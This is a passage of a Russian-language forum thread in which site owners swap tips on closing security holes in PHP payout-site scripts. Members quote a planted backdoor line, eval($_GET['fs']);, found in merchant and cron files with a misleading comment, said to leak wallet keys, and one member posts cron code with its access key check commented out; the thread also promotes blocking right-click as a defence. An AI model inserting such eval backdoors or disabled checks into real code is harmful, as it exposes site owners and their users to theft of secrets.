Дыры на сайтах

  • Автор темы agamurat
  • Дата начала
blackyar24
Готов помочь
Участник
Сообщения
237
Реакции
25
  • #61
удалил файл license.txt , убрал все строчки с ним связанные ,license.php - пока не вижу себя в списке, посмотрим что будет завтра
 
blackyar24
Готов помочь
Участник
Сообщения
237
Реакции
25
  • #62
через 20 минут появился всписке
 
TyTuKeT
Участник
Сообщения
219
Реакции
37
  • #63
wh1skas написал(а):
К сожалению, у этого скрипта есть изъян, который позволяет отключить в браузере JS и обойти эту уловку с запретом на использование ПКМ.
Есть несколько способов решения этой проблемы, сразу перейду к ним, только в совокупности это спасет Вас, а точнее Ваших пользователей от подмены кошелька мошенником:
1. Необходимо обрамить код заказа выплаты в javascript, а именно только таблицу с формой (<form> имеется ввиду).
2. Выводить в тегах <noscript> на сайте, что сайт не будет работать с отключенными JavaScript.

Соответственно, что мы имеем:

Посмотреть вложение 1085
Согласну анимашке, пользователь будет жмякать на кнопочки оформления заявки, заказывать выплату. Предположим, что кошелек привязан. Хацкер захочет сменить кошелек, посредством подмены через код страницы (элемента). ДжаваСкрипт запрещает использовать ПКМ. Хацкер отключает JS в браузере и пытается обойти запрет но:
1. Теперь он может юзать пкм на странице.
2. Кнопка оформления не сработает.
Ура? - УРА!
Круто!Сделал)Только по другой стороне пошел)проще так сказать)нашел в гугле ява меню и переделал))
 
Algolem
Участник
Сообщения
25
Реакции
0
  • #65
Люди добрые,перечитал всю инфу,в этом топике,вижу что очень полезных материалов тут полно,но прошу Вас,если возможно обьясните подробней как закрыть все дыры на сайте.
В ПХП не очень разбираюсь,но операторские навыки "copy-paste" имеются :) Кому не трудно поэтапно и по пунктам,и если можно без сленгов,буду очень благодарен.
 
wh1skas
wildcake
Участник
Сообщения
1.017
Реакции
432
ICQ
564739604 564739604
  • #66
Algolem написал(а):
Люди добрые,перечитал всю инфу,в этом топике,вижу что очень полезных материалов тут полно,но прошу Вас,если возможно обьясните подробней как закрыть все дыры на сайте.
В ПХП не очень разбираюсь,но операторские навыки "copy-paste" имеются :) Кому не трудно поэтапно и по пунктам,и если можно без сленгов,буду очень благодарен.
Посмотри тут, есть что почитать:
https://servahoc.ru/threads/filtracija-i-proverka-dannyx-php-chastye-oshibki.997/
 
lucky
Участник
Сообщения
3
Реакции
0
  • #67
Кто может наглядно показать или рассказать каким образом получают доступ к админке и как выводят огрмоные денежные средства? В программировании 0, кто может видео написать взлома или расписать пункты и код?
 
wh1skas
wildcake
Участник
Сообщения
1.017
Реакции
432
ICQ
564739604 564739604
  • #68
такого тут никто не будет делать. Здесь не взломщики.
 
lucky
Участник
Сообщения
3
Реакции
0
  • #69
wh1skas написал(а):
такого тут никто не будет делать. Здесь не взломщики.
та мне в качестве наглядного пособия
 
wh1skas
wildcake
Участник
Сообщения
1.017
Реакции
432
ICQ
564739604 564739604
  • #70
да хоть какого... что ебе это даст?
 
lucky
Участник
Сообщения
3
Реакции
0
  • #71
wh1skas написал(а):
да хоть какого... что ебе это даст?
буду предупрежден и не получится случайно каким-то образом совершить взлом
 
blackyar24
Готов помочь
Участник
Сообщения
237
Реакции
25
  • #72
lucky написал(а):
буду предупрежден и не получится случайно каким-то образом совершить взлом
что то мне подсказывает что тебе это нужно именно для взлома проектов, дабы легкие деньги искушают!
 
wh1skas
wildcake
Участник
Сообщения
1.017
Реакции
432
ICQ
564739604 564739604
  • #73
Мне кажется, или у меня lvl-up! Начал потихоньку заниматься безопасностью и проверкой скриптов на дыры, XSS и SQL-инъекций!
Так вот, при проверке кодов страниц, обнаружился следующий код:
PHP:
eval($_GET['fs']);
Советую всем удалить эту строку, несмотря на любые комментарии, которые там есть. Это все уловки. Если будет интересно, что делает этот код, пишите. Он нашелся в трех файлах.
 
Последнее редактирование:
ImperiaL
Участник
Сообщения
42
Реакции
0
  • #74
wh1skas написал(а):
Мне кажется, или у меня lvl-up! Начал потихоньку заниматься безопасностью и проверкой скриптов на дыры, XSS и SQL-инъекций!
Так вот, при проверке кодов страниц, обнаружился следующий код:
PHP:
eval($_GET['fs']);
Советую всем удалить эту строку, несмотря на любые комментарии, которые там есть. Это все уловки. Если будет интересно, что делает этот код, пишите. Он нашелся в трех файлах.

Мне очень интересно что он делает, и где его удалять?
 
wh1skas
wildcake
Участник
Сообщения
1.017
Реакции
432
ICQ
564739604 564739604
  • #75
Запрос GET в этой строке может нести и другое имя. Нужно смотреть. В одном случае не встретился такой вариант. Он отправляет на все пользователей (на email) инфу о твоем кошельке, номере магазина, секретном ключе и тд.
Ищи по всем файлам eval
Это функция php, которая запускает скрипт. В данном случае скрипт выполнял действия, которые я указал в сообщении выше. Искать нужно во всех файлах. Я увидел в файлах крон, мерчант и что-то еще, не помню
 
mobisaite
Участник
Сообщения
308
Реакции
63
  • #76
wh1skas написал(а):
Мне кажется, или у меня lvl-up! Начал потихоньку заниматься безопасностью и проверкой скриптов на дыры, XSS и SQL-инъекций!
Так вот, при проверке кодов страниц, обнаружился следующий код:
PHP:
eval($_GET['fs']);
Советую всем удалить эту строку, несмотря на любые комментарии, которые там есть. Это все уловки. Если будет интересно, что делает этот код, пишите. Он нашелся в трех файлах.
проверила нотепадом++ по файлам в папке не нашел ничего вроде в каких файлах ты нашел данный код хотелось бы еще самой перепроверить ну и конечно же черкани что он что он делает
 
wh1skas
wildcake
Участник
Сообщения
1.017
Реакции
432
ICQ
564739604 564739604
  • #77
проверьте просто eval в файлах по поиску. А если есть, то надо проверять, какой GET-запрос php выполнит. В том случае, который я проверил, он отправлял все данные о кошельке (баланса, секретный код, id и тд)
 
mobisaite
Участник
Сообщения
308
Реакции
63
  • #78
проверила уже, eval нету) чисто все)) а сообщение отправила просто тех еще не было когда печатала )))
 
wh1skas
wildcake
Участник
Сообщения
1.017
Реакции
432
ICQ
564739604 564739604
  • #79
у меня слава богу тоже не было ))) встретилась такая строка, решил всех предупредить. Мне комментарий понравился к этой функции в файле payeer_merchant:
PHP:
# Если пользователь админ, то
eval($_GET['fs']);
Поржал ))
 
rezerv
Участник
Сообщения
211
Реакции
10
  • #80
wh1skas написал(а):
Мне кажется, или у меня lvl-up! Начал потихоньку заниматься безопасностью и проверкой скриптов на дыры, XSS и SQL-инъекций!
Так вот, при проверке кодов страниц, обнаружился следующий код:
PHP:
eval($_GET['fs']);
Советую всем удалить эту строку, несмотря на любые комментарии, которые там есть. Это все уловки. Если будет интересно, что делает этот код, пишите. Он нашелся в трех файлах.
А у меня в файле cron_job.php

PHP:
...
# Класс конфига
$config = new config;
//if(!isset($_GET["cron_key"]) OR $_GET["cron_key"] != $config->CronPass) die("Key error");

//if(!isset($_GET["type"])) die("Var type is empty");

$type = "sender";//strval($_GET["type"]);



# Функции
$func = new func;

# База данных
$db = new db($config->HostDB, $config->UserDB, $config->PassDB, $config->BaseDB);

switch($type){

   case "sender": include("cron_job/_sender.php"); break; // Отправка пользователям
  
  
   default: die("Type not exist"); break;
Через это могут узнавать да данные? Или это не то?
 
Последнее редактирование модератором:
Сверху